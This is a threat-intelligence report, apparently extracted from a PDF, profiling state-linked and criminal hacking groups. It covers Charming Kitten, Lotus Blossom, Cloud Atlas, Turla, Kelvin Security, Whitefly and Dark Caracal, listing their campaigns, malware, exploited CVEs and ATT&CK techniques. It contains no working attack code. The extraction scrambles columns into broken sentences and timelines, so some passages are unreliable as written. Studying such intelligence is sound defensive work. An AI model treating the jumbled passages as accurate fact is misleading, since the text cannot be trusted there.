IRC-based malware variant. The scope secondary objective. The group's TTPs
in a report by Palo Alto Networks about
of elaborate personas and fraudulent overlap extensively with another group,
a group they call Magic Hound.
organizations created by CHARMING ATK26 (Rocket Kitten), resulting in reporting

AutoIt backdoor Mimikatz None
DownPaper
NanoCore
NETWIRE
POWERTON
Shamoon
TURNEDUP

Targeted
Countries _
Iran S
outh
Iraq Korea
Israel U
nited
S
audi Kingdom
Arabia U
nited
States
Iran
CAMPAIGNS
2011-2014 - Operation “Newscaster” 2016-2017 - Operations against
2011 Jan-2011
For three years the group created fake United-States, Saudi-Arabia and 2011-2014
accounts on social networks and a fake South Korea Operation
Newcaster
information website to spy on military and APT33 has targeted organizations – spanning
political leaders in the United States, Israel. multiple industries – headquartered in
The targets include a four-star U.S. Navy the United States, Saudi Arabia and 2012
Admiral, U.S. legislators and ambassadors, South Korea. These organizations are
as well as personnel from Afghanistan, linked to the aviation sector (both military
Britain, Iraq, Israel, Saudi Arabia and Syria. and commercial capacities), as well as
It appears that the attackers were seeking organizations in the energy sector with
authorizations to access government and ties to petrochemical production. 2013
corporate networks, as well as information

on weapons systems and diplomatic Early 2017 - MacDownloader
negotiations. The hackers created fake campaign targeting the defense
accounts on Facebook and other social industrial base
2014
networks for 14 people, populated profiles An active staging of the MacDownloader
with fictitious personal content, and then agent was first observed on a site posing
tried to become friendly targets. As a as the aerospace company “United
result, the group has reached more than Technologies Corporation”. The page
2,000 people (including some people claimed to offer “special programs and 2015
working for the FBI). courses”, specifically mentioning employees
and trainees of Lockheed Martin, Sierra
2016 - NewsBeEF Operation Nevada Corporation, Raytheon and Boeing.
Jan-2016 Jan-2016
2016-2017
2016-2017
At the end of February 2016, the Internet Operations against
August 2017 - HBO hacked by
Vast espionage
United-States -
portal of an Iranian university was identified 2016
campaign using
Saudi-Arabia and
as being able to spy on its visitors from Behzad Mesri linked to ATK35 DownPower
South-Korea
the browsers used by them. In the United States Behzad Mesri has Feb-2016
2016
been accused by the American authorities
2016-2017-Vastespionagecampaign of hacking into HBO's systems and being
NewsBeEF
Operation
Jan-2017
Early 2017
using DownPaper linked to the Charming Kitten group 2017 MacDownloader
The group seems to focus on people of (APT33, Elfin, etc.).
campaign targeting
the defence
interest to Iran in the areas of academic Aug-2017 industrial base
research, human rights and media. The December 2018 - February HBO hacked by
Behzad Mesri
focus is on Iranian dissidents living in 2019 - Attacks against the Saudi linked to ATK35
Iran or abroad, as well as people who Petrochemical sector exploiting 2018
come into contact with Iranians or report CVE-2018-20250 vulnerability

on Iranian affairs, such as journalists During the February 2019 attack wave, the Dec-2018
and reporters, media covering Iran and group tried to use the WinRAR vulnerability Dec2018-Feb2019
political advisors. Most of the targets are (CVE-2018-20250) to create an archive Attacks against
2019 the Saudi
people living in Iran, the United States, that could extract itself into an arbitrary Petrochemical
sector exploiting
Israel and the United Kingdom. Others live folder. CVE-2018-20250
in Turkey, France, Germany, Switzerland, vulnerability
the United Arab Emirates, India, Denmark

and other countries.
77
APT33 Cyber Criminal Aerospace & Objectives _
Aviation
ATK35 Chemicals Espionage
Cyber Terrorist
64 CHARMING KITTEN Communication
Hacktivist Defence
ELFIN Dissident
GROUP 83 State Sponsored Education
Energy
IKITTENS Financial Services
MAGNALLIUM Language
Healthcare
NEWSBEEF High-Tech Unknown
NEWSCASTER Manufacturing
Media
PARASTOO Research

Targeted
Countries _
Iran S
outh
Iraq Korea
Israel U
nited
S
audi Kingdom
Arabia U
nited
States
Iran

T1192 - Spearphishing Link T1053 - Scheduled Task T1105 - Remote File Copy
T1078 - Valid Accounts T1068 - Exploitation for Privilege Escalation Command and Control
Execution T1078 - Valid Accounts T1065 - Uncommonly Used Port
T1053 - Scheduled Task Defense Evasion T1071 - Standard Application Layer
T1203 - Exploitation for Client Execution T1078 - Valid Accounts Protocol
T1086 - PowerShell T1027 - Obfuscated Files or Information T1132 - Data Encoding
T1204 - User Execution T1480 - Execution Guardrails T1105 - Remote File Copy
Persistence Credential Access
T1053 - Scheduled Task T1003 - Credential Dumping
T1078 - Valid Accounts T1110 - Brute Force Exfiltration
T1060 - Registry Run Keys / Startup Folder T1040 - Network Sniffing T1002 - Data Compressed
T1048 - E xfiltration Over Alternative
Discovery
Protocol
T1040 - Network Sniffing
79
ATK1 Cyber Criminal Communication
& Objectives _
DRAGONFISH Education Espionage
Cyber Terrorist
64 ELISE Government Agencies
LOTUS BLOSSOM Hacktivist
Military
SPRING DRAGON State Sponsored
ST GROUP
Unknown
Language
Unknown
DESCRIPTION
ATK1 (aka Lotus Blossom, Spring Dragon, government organizations, mostly in sporadically until 2018, always using
DragonFish) is a cyber espionage threat Southeast Asia, probably in support of Elise as the main attack vector, and
group which targets countries around the Silk Roads project and securing the sometimes using new exploits, such as
the South China Sea. It was active since maritime face of the project. CVE-2017-11882.
at least 2012 and targets high profile At the end of 2015, Emissary received ATK1 is capable of carrying out very large
governmental organizations and political many updates, probably to avoid detection operations over a long period of time,
parties, universities and telecommunication by security products. After a very active while developing its specific arsenal. These
companies in long term operations. The period, the group remains discreet until early targets are extremely specific, and the
group is of Chinese origin. Using Elise 2017. Other campaigns are conducted group rarely deviates from them.
malware in particular, it spied on many
CAMPAIGNS Jan-2012
Attack against
2012 military and
2012 - Phishing campaign using place between 2012 and 2015. It is governement
targets in Vietnam
a PDF document containing an mainly organized around four countries, Sept-2012 Philippines Hong
Phishing Kong Taïwan and
invitation to a defence event with a dedicated infrastructure for each campaign using Indonesia
In September 2012, a phishing campaign target. The four countries are Vietnam, a PDF document
2013 containing an
using a PDF document containing an the Philippines, Hong Kong and Taiwan invitation to a
Jul-2013
defence event
invitation to a defence event was detected. (same infrastructure), as well as Indonesia. Attack against
Taïwan United-
2013 - Attack against Taiwan, United- 2015 - Emissary Malware used States Canada
and some other
States, Canada and some other against French Ministry of Foreign 2014
countries
countries Affairs
In the second half of 2013, during a new In 2015, the group is particularly active,
campaign, Elise malware was identified and is demonstrating new distribution
methods for its malware, particularly Jan-2015
as part of a larger malware group, called 2015 Emissary Malware
LSudio. This campaign mainly targets using “Water Holes”. The group also used against
Taiwan (nearly 84% of attacks) as well attacked the French Ministry of Foreign French Ministry of
Foreign Affairs
as the United States, Canada and other Affairs and more particularly a diplomat
countries. Governments, electronics stationed in Taipei.
manufacturers and telecommunications 2016
2017 - Elise campaign against its
companies are the first victims. traditional targets in Southeast Asia
Attackagainstmilitaryandgovernment In 2017 AT1 has been running a campaign
targets in Vietnam, Philippines, Hong focused on its traditional targets, government Jan-2017
2017
Kong, Taiwan and Indonesia organizations, academic institutions and Elise campaign
against its
A particularly important campaign takes telecoms in Southeast Asia. traditionnal targets
in Southeast Asia

Elise None CVE-2017-11882 CVE-2014-4114
Emissary CVE-2014-6332 CVE-2009-0927
CVE-2012-0158

Targeted
Countries _
Hong-Kong
Indonesia
Philippines
Taiwan
Vietnam
China

T1189 - Drive-by Compromise T1027 - Obfuscated Files or Information T1105 - Remote File Copy
T1193 - Spearphishing Attachment T1036 - Masquerading Command and Control
Execution T1045 - Software Packin T1032 - Standard Cryptographic Protocol
T1035 - Service Execution T1055 - Process Injection T1043 - Commonly Used Port
T1064 - Scripting T1064 - Scripting T1071 - Standard Application Layer
T1085 - Rundll32 T1085 - Rundll32 Protocol
T1107 - File Deletion T1094 - Custom Command and Control
Persistence T1140 - Deobfuscate/Decode Files or Protocol
T1136 - Create Account Information T1105 - Remote File Copy
T1050 - New Service T1497 - Virtualization/Sandbox Evasion
T1060 - Registry Run Keys / Startup Folder Exfiltration
Credential Access
T1098 - Account Manipulation T1022 - Data Encrypted
T1098 - Account Manipulation
Discovery
T1050 - New Service
81
ATK116 Cyber Criminal Aerospace & Objectives _
CLOUD ATLAS Energy Cyber Espionage
Cyber Terrorist
63 INCEPTION GROUP Government Agencies
Hacktivist
Military
State Sponsored Research
Unknown
Language
Russian
DESCRIPTION
Cloud Atlas is a cyber espionage group working as a chain of proxies to hide the After the Kaspersky disclosure in 2013,
active since at least 2007, focusing on attacker's location. Cloud Atlas is able to the group has been hiding and then
governmental agencies around the world. target mobile devices, network equipment reappeared in 2014 with the “Cloud
This group is known for the Operation Red and removable disk drives increasing the Atlas” malware. This behaviour will be
October targeting governmental agencies quantity of sensitive data accessible. They repeated thereafter in 2014 consecutively
(embassies), research, energy, aerospace use multiples exploits but not 0-days which to a new Symantec publication. The group
and military in a wide range a country, can be interpreted as a lack of resources. improved its C2 infrastructure in 2014
mostly in Russia, Western and Eastern Cloud Atlas created the Inception by using cloud services which have the
Europe, Central Asia, South America framework. A sophisticated framework advantage to not being blacklisted and
and Africa. This group seems to have able to launch multiple modules use encrypted communication protocols.
Russian-speaking origins. allowing the group to adapt to its target. They can also use compromised router
It used a large CnC network of infected This framework is still used in 2019. as proxies to hide their origin.
machines and dozens of domain names
CAMPAIGNS
Jan-2007
2007 - 2013 - Operation Red October October 2018 - Attack against 2007
Operation Red
The Red October is a series of targeted European targets 2008 October
intelligence gathering attacks against Cloud Atlas used a new first-stage PowerShell 2009
diplomatic, governmental and scientific backdoor called POWERSHOWER to 2010
research organizations, mostly located in target European organizations. The lure
2011
Eastern Europe, former URSS members documents are about pollical actualities
Central Asia. 2012
like articles about the situation in Crimea.
2013
2014 - 2017 - Re-emergence of the Jan-2014
Inception Group 2014 Re-emergence
of the Inception
2015
After the disclosures, Cloud Atlas group Group
was silent but re-emerge with improved 2016
malware and techniques. They continue to 2017

target embassies, the security, aerospace,
2018
research, and media sectors around the Oct-2018
2019 Attack against
world. European targets

Inception framework None CVE-2017-11882 CVE-2018-0802
POWERSHOWER CVE-2014-1761 CVE-2010-3333
VBShower CVE-2012-0158 CVE-2009-3129
CVE-2011-3544 CVE-2012-1856

Afghanistan Pakistan
Armenia Russia
Azerbaijan Switzerland
Belarus Turkmenistan
Belgium Uganda
Greece Ukraine
India U
nited Arab
Iran Emirates
Italy United States
Kazakhstan Vietnam
Morocco
Unknown

T1192 - Spearphishing Link T1056 - Input Capture T1065 - Uncommonly Used Port
T1193 - Spearphishing Attachment T1003 - Credential Dumping T1071 - Standard Application Layer
T1091 - Replication Through Removable T1214 - Credentials in Registry Protocol
Media Discovery T1032 - Standard Cryptographic Protocol
Execution T1082 - System Information Discovery Exfiltration
T1086 - PowerShell T1046 - Network Service Scanning T1022 - Data Encrypted
Persistence Lateral Movement
T1060 - Registry Run Keys / Startup Folder T1091 - Replication Through Removable
Media
Defense Evasion Collection
T1107 - File Deletion T1056 - Input Capture
T1112 - Modify Registry T1113 - Screen Capture
T1140 - Deobfuscate/Decode Files or T1114 - Email Collection
Information
T1025 - Data from Removable Media
83
ATK13 Cyber Criminal Government Agencies & Objectives _
HIPPO TEAM I nternational Espionage
GROUP 88 Cyber Terrorist
63 KRYPTON Organizations
PFINET Hacktivist Political Organizations
POPEYE State Sponsored High-Tech
SNAKE
TAG_0530 Unknown Research
TURLA Defence Language
UROBUROS
VENOMOUS BEAR Aerospace Unknown
WATERBUG
WRAITH
DESCRIPTION
ATK13 (Turla, Uroburos, Waterbug, organizations in multiple waves of attacks alder of the Iranian nuclear agreement,
Venomous Bear) is a cyber espionage and continues to improve its tools. The supported by the former US President.
threat actor active since at least 2008, most recent attack targeted an Iranian It seems that the change in American
when it breached the US Department of APT group called OilRig. diplomatic line since the election of Donald
Defence. ATK13 is a Russian-speaking Turla's attack on one of Iran's most Trump has not diverted Saudi Arabia
group and widely believed to be a Russian successful groups combines opportunism from this alliance. This rapprochement
state-sponsored organization. and international interests. It should be of interests is denounced by Iran, most
In 2015, Kaspersky described ATK13 as recalled that since 2014 and the annexation recently at the OPEC meeting in Vienna
one of the “several elite APT groups have of the Crimea, Western pressures and in July 2019. The reason for the tension
been using — and abusing — satellite the fall of the oil price have plunged is also economic as both countries are
links to manage their operations — most Russia into recession. For this reason, positioning themselves to address the
often, their C&C infrastructure”. Russia has moved closer to Saudi Arabia, European gas market.
During 2018 and 2019, ATK13 continues whose alliance with the United States had
to target governments and international weakened under the Obama era in the

Agent.Btz Arp CVE-2012-1723
Carbon Empire CVE-2013-5065
Comrat Mimikatz CVE-2013-3346
Epic Nbtstat CVE-2009-3129
Gazer Net CVE-2013-2729
Kazuar Netstat CVE-2012-4681
Kopiluwak Reg
Mosquito Systeminfo
Neptun Tasklist
Turla outlook backdoor
Uroburosl

Europe Netherlands
Middle East Romania
Central Asia Germany
United Kingdom Iraq
Uzbekistan Belgium
United States France
Tajikistan Belarus
Saudi Arabia Italy
Poland Jordan
Kazakhstan Iran
Russia India
Russia
CAMPAIGNS
2005
November 2008 - Cyber-attack on Turla conducted a watering hole
US Defense Department computers campaigns by targeting embassy
In November 2008, senior military leaders websites
2006
reported the malware breach incident During the 2014 - 2017 period, ATK13
that affected the U.S. Central Command seems to conduct watering hole campaigns
Jan-2005
network, including computers both in by targeting embassy websites as described 2005-2014
the headquarters and in the combat by ESET using the javascript payload 2007
The Snake
zones. The malware used was Agent. ICEDCOFFEE. campaign
btz. This attack was quickly attributed

to Russia. In 2010 this attack has been Turla used a designed Adobe Flash
2008
confirmed by a top Pentagon official. The fake installer and used a web app
Jan-2008
worm Agent.btz spread itself into the US hosted on Google Apps Script as a November 2008
Defense Department network through CnC server. Cyber-attack

2009 on US Defense
USB flash drive using “autorun.inf”. It is In 2018, ATK13 used a very well-designed Department
computers
considered as 'the worst breach of U.S. Adobe Flash fake installer and used a
military computers in history". It conducted web app hosted on Google Apps Script
to the United States Cyber Command as a CnC server. The typical targets are 2010
creation and the Pentagon spent nearly still embassies and consulates in Eastern Jan-2011
Turla has targeted
14 months cleaning the worm. The US Europe. government
military was not the only victims, indeed 2011
institutions -
the worm spread globally and was still GovernmentsandDefensecontractors military - education
- research and
infecting users in 2013. compromised pharmaceutical
companies in more
In March 2018, the German government than 45 countries
2005 - 2014 - The Snake campaign made a public announcement of its 2012
The Snake campaign is a long-term compromising by a Turla's Outlook backdoor.

Jan-2013
operation targeting mostly European
entities. BAE-System found samples linked Turla attacked OilRig 2013
Governments
and Defense
to this activity compiled from 2005 to Symantec observed ATK13 (called WaterBug) contractors
compromised
2014 which may indicate that this activity targeting the infrastructure of another
may have started in 2005. advanced persistent group, Iranian this Jan-2014 Jan-2014
2014
time, called OilRig (ATK40). Turla attacks a Turla conducted
Turla has targeted government Swiss company a watering hole
campaigns by
institutions, military, education, targeting embassy
websites
research and pharmaceutical 2015
companies in more than 45 countries

In July 2014, Kaspersky described the Epic
Turla Operation targeting government 2016
institutions, embassies, military, education,
research and pharmaceutical companies
in more than 45 countries for 10 months.
2017
Turla targeted the Finnish Foreign Ministry
in 2013 as part of this operation. Jan-2018
Turla used a
Turla attacks a Swiss company 2018
designed Adobe
Flash fake installer
Jan-2018
Turla attacked
Turla targeted the Swiss military firm RUAG and used a web OilRig
app hosted on
between 2014 and 2016. Google Apps Script
as a CnC server
85
HIPPO TEAM I nternational Espionage
GROUP 88 Cyber Terrorist
63 KRYPTON Organizations
PFINET Hacktivist Political Organizations
POPEYE State Sponsored High-Tech
SNAKE
TAG_0530 Unknown Research
TURLA Defence Language
UROBUROS Unknown
VENOMOUS BEAR Aerospace
WATERBUG
WRAITH

Europe Netherlands
Middle East Romania
Central Asia Germany
United Kingdom Iraq
Uzbekistan Belgium
United States France
Tajikistan Belarus
Saudi Arabia Italy
Poland Jordan
Kazakhstan Iran
Russia India
Russia
Initial Access Credential Access Lateral Movement

T1192 - Spearphishing Link T1110 - Brute Force T1077 - Windows Admin Shares
T1193 - Spearphishing Attachment Discovery T1105 - Remote File Copy
Execution T1049 - System Network Connections Command and Control
T1086 - PowerShell Discovery T1071 - Standard Application Layer
T1204 - User Execution T1012 - Query Registry Protocol
Persistence T1057 - Process Discovery T1105 - Remote File Copy
T1124 - System Time Discovery T1102 - Web Service
T1004 - Winlogon Helper DLL
T1016 - System Network Configuration Exfiltration
Discovery
Privilege Escalation T1011 - Exfiltration Over Other Network
T1007 - System Service Discovery
Medium
T1055 - Process Injection T1082 - System Information Discovery
Defense Evasion T1083 - File and Directory Discovery
T1102 - Web Service T1018 - Remote System Discovery
T1066 - Indicator Removal from Tools
87
ATK 140 Cyber Criminal Administration Hospitality & Objectives _
Aerospace International
Kelvin Security Aviation Personal-gain
Cyber Terrorist Organizations
KelvinSec Team C
asino & Manufacturing Notoriety
62 Hacktivist Gaming Media
KelvinSecteamGobVe Communication Military Ideology
TAG-CR6 State Sponsored Cyber-security
Defense Naval
teamkelvinsecteam Education Pharmaceutical
Unknown Energy P
olitical
F
inancial Organizations Language
Services Research
G
overnment English, Spanish
Retail
Agencies Transportation
Healthcare
High-Tech
Kelvin Security is a South American “blackhat” the government sector. The group specialty June 2015 - University Of Madrid
hacking group, led by an individual are web-based attacks that typically lead Attack
named Kevin Parra. The group is active to data exfiltration. However, the group Kelvin Security claimed responsibility for
since at least 2015 and displays medium also displayed interest in compromising hacking UNIVERSIDAD POLITÉCNICA DE
technical capabilities. The group has a ICS/SCADA systems and medical devices. MADRID (hxxp://www.upm.es/)
vast online presence, both in the Clearnet The group also runs an online shop
(with numerous social media outlets, a (hxxp://ksecureteam[.]com) where they June 2016 - Saudi Arabia Banks
YouTube channel, blogs, etc.), and in Dark offer a variety of hacking-related services Attack
Web forums and markets populated by (malware, exploits, databases, systems Kelvin Security claimed responsibility for
cybercriminals. These outlets are mainly access, etc.), also as a subscription model. hacking Saudi Arabia bank accounts.
utilized for promoting stolen data they sell Alleged Kelvin Security’s members: July 2016 - Miami and Lax Airports
and sharing malicious tools and techniques Kelvin Parra (Venezuela) Rodrigo Alonzo Attack
(usually publicly available). During their Canaza (Peru) Omar Rodriguez (Peru) Kelvin Security claimed responsibility
activity Kelvin Security claimed responsibility Jhonatan James (Colombia) for hacking the Miami and Lax Airports
for hundreds of attacks against almost all
dumping data.
industry verticals, with a particular focus on
July 2017 - Italian Nuclear Institute
Attack
Kelvin Security claimed responsibility for
TOOLS, MALWARES AND VULNERABILITIES hacking the Italian “Istituto Nazionale di
Fisica Nucleare” dumping data.
2018 - Venezuelan Government
Custom tools LizardStresser Bot one Identified
N Attack
regimenDDoS Loki RAT
Nmap
Exploited vulnerabilities Kelvin Security leaked PII of Venezuelan
WhatsApp IP Capture Script Government officials, including that of
OutlookLeakTest CVE-2016-0777
Tools used by multiple adversaries President Nicolás Maduro.
PhoneMonitor CVE-2016-8858
KimcilWare Ransomware
PoT CVE-2017-3881 June 2018 - US Aircraft Drone Attack
Publicly available tools QTLJacking Kelvin Security offered for sale alleged
Athena Botnet CVE-2018-10561
RACP top secret documents for Reaper and
BoopSuite Splice-Admin CVE-2018-10676 Predator drones.
Browser-RAT TrojanCockroach CVE-2018-1133
Burp Suite Vanilla RAT
June 2018 - Venezuela’s electoral
Chimay-Red
CVE-2018-20377 system Attack
WES-NG
Chrome Password Dumper cisco-rce CVE-2018-2879 Kelvin Security offered for sale alleged data
Crypter google-drive-exploit CVE-2018-7600 stolen from Venezuela’s electoral system
Dumb0 google_RAT June 2018 - Chilean Oil and Energy
CVE-2019-0708
GPON iGoat-Swift Companies Attack
Hodin RAT CVE-2019-0841
izi-locker Kelvin Security offered for sale access and
Industrial Security Exploitation rdroid CVE-2019-7216
shell for contractors in Chile
Framework snallygaster
Katana Framework vhackos-botnet June 2018 - Security Cameras USA
LSB-Steganography and Mexico Border Attack
LimeRAT Kelvin Security shared for free access
to security cameras between USA and
Mexico Border
June 2018 - Kinder Morgan Attack
Kelvin Security claimed responsibility for
hacking the SCADA system of Kinder
Morgan in Roswell, Nevada

Argentina Israel Sweden
Australia Italy Switzerland
Bolivia Kazakhstan Taiwan
Brazil Kuwait Netherlands
China Mexico Philippines
Colombia Morocco Turkey
Dominican Pakistan U
nited
Republic Peru States
Ecuador Poland Ukraine
France Russian Uruguay
Germany Federation
Hong Kong South Venezuela
India Korea
Iran Spain
Venezuela – Colombia - Peru
June 2018 - Mexico City Airport August 2018 - CITADEL Stock 2015
Attack Exchange Attack

Kelvin Security offered for sale an alleged Kelvin Security offered for sale an alleged
database of “Grupo Aeroportuario de la database of Citadel
Ciudad de Mexico” Jun-2015
November 2018 - Government University of
June 2018 - Bank of Venezuela System of Mexico Attack Madrid attack
Attack Kelvin Security offered for sale an alleged

Kelvin Security offered for sale an alleged Government System of Mexico database
database of Banplus bank and access
June 2018 - Peru Transportation November2018 - NORTON Colombia 2016
System Attack Attack

Kelvin Security offered for sale an alleged Kelvin Security shared for free an alleged
database of Peru Transportation System database of NORTON (Symantec) Colombia Jun-2016
Saudi Arabia banks
July 2018 - Colombian Intelligence January 2019 - Government of attack Jul-2016
Miami and
System Attack Colombia Attack LaxAirports attack
Kelvin Security offered for sale an alleged Kelvin Security offered for sale alleged
Colombian Intelligence System Similar to databases of multiple Colombian government
NSA’s XKeyscore websites
July 2018 - Citadel New York Stock January 2019 - Colombian Banks 2017
Exchange Attack Attack

Jun-2018
Kelvin Security offered for sale an alleged Kelvin Security offered for sale alleged
• US Aircraft Drone
database of Citadel New York Stock databases of multiple Colombian banks attack
Exchange
February 2019 - Cuba Airline Attack
• Venezuela's
Jul-2017
electoral system
August 2018 - Boodai Aviation Kelvin Security shared for free an alleged
Italian Nuclear
Institute attack
attack
United Arab Emirates Attack database of Cuba Airlines pilots

• Chilean Oil
and Energy Aug-2018
companies attack
Kelvin Security offered for sale sensitive
data allegedly stolen from the Boodai
March 2019 - ICS Access for Multiple • Security cameras
• Boodai Aviation
United Arab
Aviation Group
Countries Attack 2018
USA and Mexico
border attack
Emirates attack
• Credit Bank
Kelvin Security offered for sale access to 2018 • Kinder Morgan
Venezuelan Colombia users
August 2018 - Credit Bank Colombia 225 ICS from USA, Russia, South Korea, Government attack attack sytem attack
Mexico City airport
Users System Attack Australia, Sweden, France, Germany, • attack
• Movistar Mexico
attack
Kelvin Security offered for sale an alleged and Spain • Bank of • Air Force
Venezuela attack Venezuela
database of Bancoomeva bank
March 2019 - Airbnb Spain Attack • Peru
Transportation
system attack
August 2018 - Movistar Mexico Kelvin Security shared for free alleged Jul-2018 system attack
• Dubai Petroleum
customers attack
Attack databases stolen from Airbnb Spain • Colombian • Citadel stock
Intelligence exchange attack
Kelvin Security claimed to have found System attack
a SQLi vulnerability in Movistar Mexico

April 2019 - Ecuadorian Satellites • Citadel New York
Attack stock exchange Nov-2018
attack
August 2018 - Air Force Venezuela Kelvin Security shared for free alleged 2019 Jan-2019 • Government
system of Mexico
System Attack access to Ecuadorian satellites position Feb-2019
• Government of
Colombia attack
attack
Cuba Airline attack • Norton Colombia

Kelvin Security offered for sale the SEID • Colombian banks
(Sistema del Evaluacion Integral Digitalizado)

June 2019 - Iran Mizbanfa Hosting Mar-2019
attack
attack
system of Venezuelan airforce

Attack • OCS Access Apr-2019 Jun-2019
Kelvin Security claimed responsibility for for multiple
Ecuadorian • Iran Mizbanfa
August 2018 - Dubai Petroleum
countries attack
compromising the Iranian mizbanfa.net • Airbnb Spain
satellites attack hosting attack
Customers Attack Internet hosting provider attack • Japan National

Defense
Kelvin Security offered for sale an alleged Academy attack
user database of the Dubai Petroleum

June 2019 -JAPAN National Defense
company
Academy Attack
Kelvin Security shared for free alleged access 2020
to JAPAN National Defense Academy servers
89
ATK 140 Cyber Criminal Administration Hospitality & Objectives _
Aerospace International
Kelvin Security Aviation Personal-gain
Cyber Terrorist Organizations
KelvinSec Team C
asino & Manufacturing Notoriety
62 Hacktivist Gaming Media
KelvinSecteamGobVe Communication Military Ideology
TAG-CR6 State Sponsored Cyber-security
Defense Naval
teamkelvinsecteam Education Pharmaceutical
Unknown Energy P
olitical
F
inancial Organizations Language
Services Research
G
overnment English, Spanish
Retail
Agencies Transportation
Healthcare
High-Tech

Argentina Israel Sweden
Australia Italy Switzerland
Bolivia Kazakhstan Taiwan
Brazil Kuwait Netherlands
China Mexico Philippines
Colombia Morocco Turkey
Dominican Pakistan U
nited
Republic Peru States
Ecuador Poland Ukraine
France Russian Uruguay
Germany Federation
Hong Kong South Venezuela
India Korea
Iran Spain
Venezuela – Colombia - Peru
Initial Access Privilege Escalation Exfiltration

T1078 - Valid Accounts T1078 - Valid Accounts T1002 - Data Compressed
T1133 - External Remote Services Defense Evasion T1020 - Automated Exfiltration
T1190 - Exploit Public-Facing Application T1064 - Scripting T1022 - Data Encrypted
Execution T1078 - Valid Accounts T1041 - Exfiltration Over Command and
Control Channel
T1059 - Command-Line Interface Credential Access T1048 - E xfiltration Over Alternative
T1064 - Scripting T1003 - Credential Dumping Protocol
T1061 - Graphical User Interface T1110 - Brute Force
T1086 - PowerShell
Command and Control
Persistence T1043 - Commonly Used Port
T1078 - Valid Accounts T1219 - Remote Access Tools
T1133 - External Remote Services
91
ATK83 Cyber Criminal Engineering & Objectives _
SectorM04 Healthcare Espionage
Cyber Terrorist
Whitefly Media
61 Hacktivist
Telecommunication
State Sponsored
Unknown
Language
Unknown
DESCRIPTION
ATK83 (Whitefly) is the group responsible database. The Singapore's Committee of conducted multiple targeted attacks against
of the SingHealth breach in between Inquiry described the attacker as skilled, organizations mostly in Singapore into a
August 2017 and July 2018 during which sophisticated and well-resourced with large range of sectors to steal sensitive
1M5 patient medical records have been an extensive C2 infrastructure and the information. Some custom tools used by
acceded and around 159 000 of these capability to develop multiple customised WhiteFly were also used between May
records were exfiltrated, including those and stealthy tools. Whitefly made great 2017 and December 2018 to conduct
of the Prime Minister Lee Hsien Loong (it efforts to stay undetected or, at least, to set attacks against defense, telecom and
should be noted that the Singaporean the attack difficult to attribute. It re-entered energy sectors in Southeast Asia and
Prime Minister has had significant health the network after being detected to delete Russia or the hospitality sector in the
concerns in the past). Whitefly likely systems and program logs. United Kingdom but these attacks may
used phishing to gain access to front- Symantec discovered that this group be launched by groups with access to
end workstation before moving laterally was active since at least 2017 and has the same tools.
to the SCM (Sunrise Clinical Manager)
CAMPAIGNS 2017
SingHealth cyber attack

Between 23 August 2017 and 20 July
2018, a cyber-attack of unprecedented
scale and sophistication was carried out on
the patient database of Singapore Health
Services Private Limited (“SingHealth”).
Aug-2017
SingHealth cyber
attack
2018

Nibatad Mimikatz CVE-2016-0051
PlugX
Termite
Vcrodat

Targeted
Countries _
Singapore
Southeast Asia
Unknown

T1078 - Valid Accounts T1038 - DLL Search Order Hijacking T1049 - System Network Connections
T1192 - Spearphishing Link T1050 - New Service Discovery
T1193 - Spearphishing Attachment T1078 - Valid Accounts T1082 - System Information Discovery
Execution T1179 - Hooking Command and Control
T1035 - Service Execution Defense Evasion T1032 - Standard Cryptographic Protocol
T1204 - User Execution T1036 - Masquerading T1043 - Commonly Used Port
T1038 - DLL Search Order Hijacking T1071 - Standard Application Layer
Persistence
T1078 - Valid Accounts Protocol
T1050 - New Service T1158 - Hidden Files and Directories Exfiltration
T1060 - Registry Run Keys / Startup Folder Credential Access T1022 - Data Encrypted
T1078 - Valid Accounts T1003 - Credential Dumping Impact
T1158 - Hidden Files and Directories T1179 - Hooking T1485 - Data Destruction
T1179 - Hooking
93
ATK 27 Cyber Criminal Defense & Objectives _
DARK CARACAL Education Coercion
Cyber Terrorist
TAG-CT3 Financial Services Ideology
59 Hacktivist Organizational-gain
Government Agencies
Unpredictable
State Sponsored Healthcare
Unknown I nternational
Organizations Language
Unknown
Legal Services
Manufacturing
Media
DESCRIPTION
Dark Caracal is an advanced persistence was traced to the headquarters of the surveillance operation targeting individuals
threat group threat group in activity since General Directorate of General Security, and institutions globally.
January 2012. It is supposedly linked to in Beirut Lebanon. Dark Caracal has been
the Lebanese government since its activity conducting a multi-platform APT-level
CAMPAIGNS
Jan-2012
January 2012 - First Mobile June 2015 - Operation Manul 2012 First Mobile
surveillance Campaign Operation Manul phishing emails first surveillance
Campaign
Named oldb, an android campaign that seen. the campaign included a series of
Nov-2012
included stealing bookmarks and browsing attacks targeting journalists and political 2013 Phishing Campaign
history from web pages. it identified victims activists critical of Kazakhstan’s authoritarian
that were active in political discourse. government, along with their family members,
lawyers, and associates. References were
November2012 - Phishing Campaign found s to Android components found on
2014
Security researches identified four “personas”, the infrastructure built by Dark Caracal.
two phone numbers and two domains
associated with Dark Caracal, all of December 2016 - January 2018 2015
which are somehow connected to the - Mobile Surveillance Campaign Jun-2015

email address op13@mail[.]com. Aliases Over the course of several years, Dark Operation Manul
associated with op13@mail[.]com include Caracal has lunched mobile surveillance 2016
Nancy Razzouk, Hadi Mazeh, and Rami campaigns. About 10 campaigns were Dec-2016
Jabbour. All of the physical addresses found in total. Jan-2018
listed in the WHOIS domain registrations 2017
Mobile
Surveillance
associated with op13@mail[.]com tend Campaign
to cluster around the SSID: Bld3F6 Wi-Fi
locations. This is near the General Security
2018
building in Beirut,

Custom tools Signal cross-platform encrypted Flash Player software used to stream
Pallas messaging app that was trojanized by and view video, audio and multimedia
Windows Malware the adversary to steal sensitive data. and Rich Internet Applications (RIA)
CrossRAT Threema cross-platform encrypted on a computer or supported mobile
Tools used by multiple adversaries messaging app that was trojanized by device. It was that was trojanized by
FinFisher the adversary to steal sensitive data. the adversary to steal sensitive data.
Primo social chat app that was Google Play Push Notification push
trojanized by the adversary to steal for Google Play app in Android that
None Identified
sensitive data. was trojanized by the adversary to
Exploited vulnerabilities WhatsApp social chat app that was steal sensitive data.
None Identified used for sending phishing messages Psiphon VPN secure navigation
to victims. Orbot: TOR Proxy secure navigation
PlusMessnger social chat app that
was used for sending phishing
messages to victims.

China Qatar
France Russia
Germany Saudi Arabia
India South Korea
Italy Switzerland
Jordan Syria
Lebanon Thailand
Nepal United
Netherlands States
Pakistan Venezuela
Philippines Vietnam
Lebanon
Initial Access Persistence Discovery

T1078 - Valid Accounts T1060 - Registry Run Keys / Startup Folder T1083 - File and Directory Discovery
T1133 - External Remote Services T1078 - Valid Accounts Collection
T1189 - Drive-by Compromise T1133 - External Remote Services T1005 - Data from Local System
